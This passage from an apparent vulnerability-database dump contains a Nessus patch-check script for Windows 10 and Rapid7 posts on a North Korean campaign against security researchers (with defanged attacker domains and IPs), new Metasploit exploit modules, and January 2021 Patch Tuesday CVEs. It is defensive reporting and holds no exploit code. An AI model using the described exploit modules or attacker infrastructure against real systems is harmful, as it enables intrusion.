ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. 
(CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. 
(CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. 
(CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598230/windows-10-update-kb4598230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8370504\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598230.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "\n\n_This blog was co-authored by Caitlin Condon, VRM Security Research Manager, and Bob Rudis, Senior Director and Chief Security Data Scientist._\n\nOn Monday, Jan. 
25, 2021, Google\u2019s Threat Analysis Group (TAG) [published a blog on a widespread social engineering campaign](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) that targeted security researchers working on vulnerability research and development. The campaign, which Google attributed to North Korean (DPRK) state-sponsored actors, has been active for several months and sought to compromise researchers using several methods.\n\nRapid7 is aware that many security researchers were targeted in this campaign, and information is still developing. While we currently have no evidence that we were compromised, we are continuing to investigate logs and examine our systems for any of the [IOCs listed in Google\u2019s analysis](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>). We will update this post with further information as it becomes available.\n\nOrganizations should take note that this was a highly sophisticated attack that was important enough to those who orchestrated it for them to burn an as-yet unknown exploit path on. This event is the latest in a chain of attacks\u2014e.g., those targeting SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds\u2014that demonstrates a significant increase in threat activity targeting cybersecurity firms with legitimately sophisticated campaigns. Scenarios like these should become standard components of tabletop exercises and active defense plans.\n\n## North Korean-attributed social engineering campaign\n\nGoogle discovered that the DPRK threat actors had built credibility by establishing a vulnerability research blog and several Twitter profiles to interact with potential targets. 
They published videos of their alleged exploits, including a YouTube video of a fake proof-of-concept (PoC) exploit for CVE-2021-1647\u2014a [high-profile Windows Defender zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>) that garnered attention from both security researchers and the media. The DPRK actors also published \u201cguest\u201d research (likely plagiarized from other researchers) on their blog to further build their reputation.\n\nThe malicious actors then used two methods to social engineer targets into accepting malware or visiting a malicious website. [According to Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>):\n\n * After establishing initial communications, **the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.** Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional pre-compiled library (DLL) that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled command and control (C2) domains.\nVisual Studio Build Events command executed when building the provided VS Project files. Image provided by Google.\n\n * In addition to targeting users via social engineering, Google also observed several cases where researchers have been compromised after visiting the actors\u2019 blog. In each of these cases, the researchers followed a link on Twitter to a write-up hosted on `blog[.]br0vvnn[.]io`, and shortly thereafter, a malicious service was installed on the researcher\u2019s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. 
**At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.** As of Jan. 26, 2021, Google was unable to confirm the mechanism of compromise.\n\nThe blog the DPRK threat actors used to execute this zero-day drive-by attack was posted on Reddit as long as three months ago. The actors also used a range of social media and communications platforms to interact with targets\u2014including Telegram, Keybase, Twitter, LinkedIn, and Discord. As of Jan. 26, 2021, many of these profiles have been suspended or deactivated.\n\n## Rapid7 customers\n\nGoogle\u2019s threat intelligence includes information on IOCs, command-and-control domains, actor-controlled social media accounts, and compromised domains used as part of the campaign. Rapid7's MDR team is deploying IOCs and behavior-based detections. These detections will also be available to InsightIDR customers later today. We will update this blog post with further information as it becomes available.\n\n## Defender guidance\n\nTAG noted in their blog post that **they have so far only seen actors targeting Windows systems.** As of the evening of Jan. 25, 2021, researchers across many companies [confirmed on Twitter](<https://twitter.com/richinseattle/status/1353864756109578241>) that they had interacted with the DPRK actors and/or visited the malicious blog. 
Organizations that believe their researchers or other employees may have been targeted should conduct internal investigations to determine whether indicators of compromise are present on their networks.\n\nAt a minimum, responders should:\n\n * Ensure members of all security teams are aware of this campaign and encourage individuals to report if they believe they were targeted by these actors.\n * Search web traffic, firewall, and DNS logs for evidence of contacts to the domains and URLs provided by Google in their post.\n * According to [Rapid7 Labs\u2019 forward DNS archive](<https://opendata.rapid7.com>), the `br0vvnn[.]io` apex domain has had two discovered fully qualified domain names (FQDNs)\u2014`api[.]br0vvnn[.]io` and `blog[.]br0vvnn[.]io`\u2014over the past four months with IP addresses `192[.]169[.]6[.]31` and `192[.]52[.]167[.]169`, respectively. Contacts to those IPs should also be investigated in historical access records.\n * Check for evidence of the provided hashes on all systems, starting with those operated and accessed by members of security teams.\n\nMoving forward, organizations and individuals should heed Google\u2019s advice that _\u201cif you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.\u201d_\n\n## Updates\n\n2021-02-05 \u2022 As Rapid7 is a cybersecurity vendor with many security researchers on staff, we began an internal investigation immediately after this campaign was disclosed to determine if there was any impact to us or our researchers. We have completed our investigation and have found no evidence of compromise. 
If or when new information arises, we will perform additional investigations and provide further updates at that time.\n", "modified": "2021-01-26T15:01:33", "published": "2021-01-26T15:01:33", "id": "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "href": "https://blog.rapid7.com/2021/01/26/state-sponsored-threat-actors-target-security-researchers/", "type": "rapid7blog", "title": "State-Sponsored Threat Actors Target Security Researchers", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-28T04:47:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "description": "\n\nMetasploit keeping that developer awareness rate up.\n\nThanks to [mr_me](<https://github.com/stevenseeley>) & [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the server's config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. 
Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onto solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by 
[wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) makes the commands executed during `apk` generation more explicit about their options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. 
Incomplete option names and values can also be suggested; for example, typing `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, both as a standalone LPE module and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users both to elevate their privileges on affected versions of Windows and to potentially execute a full end-to-end attack chain from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>) ensures that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2020-10-23T18:56:55", "published": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T00:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", 
"CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "description": "\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly some from less frequent products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is marked as a CVSS 7.8, actively exploited, remote code execution vulnerability in the Microsoft Malware Protection Engine (mpengine.dll), affecting engine versions from 1.1.17600.5 up to 1.1.17700.4. \n\nBy default, Microsoft's affected antimalware software automatically keeps the Microsoft Malware Protection Engine up to date. What this means is that no further action is needed to resolve this vulnerability unless non-standard configurations are used. \n\nThis vulnerability affects Windows Defender, as well as the supported Endpoint Protection pieces of the System Center family of products (2012, 2012 R2, and the namesake version, Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice to prioritize Operating System patches whenever possible: 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday are immediately covered by those patches alone. 
As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month. This RPC Runtime component accounts for 9 of the 13 top CVSS-scoring vulnerabilities, along with half of the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, two minor notes: this Patch Tuesday includes SQL Server, an atypical family for Patch Tuesday coverage, and, arguably more notable, it is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and should already have been actively removed from all browsers via Windows Update.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server 
Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1663](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1663>) | Windows Projected File System FS Filter Driver Information Disclosure Vulnerability | No | 
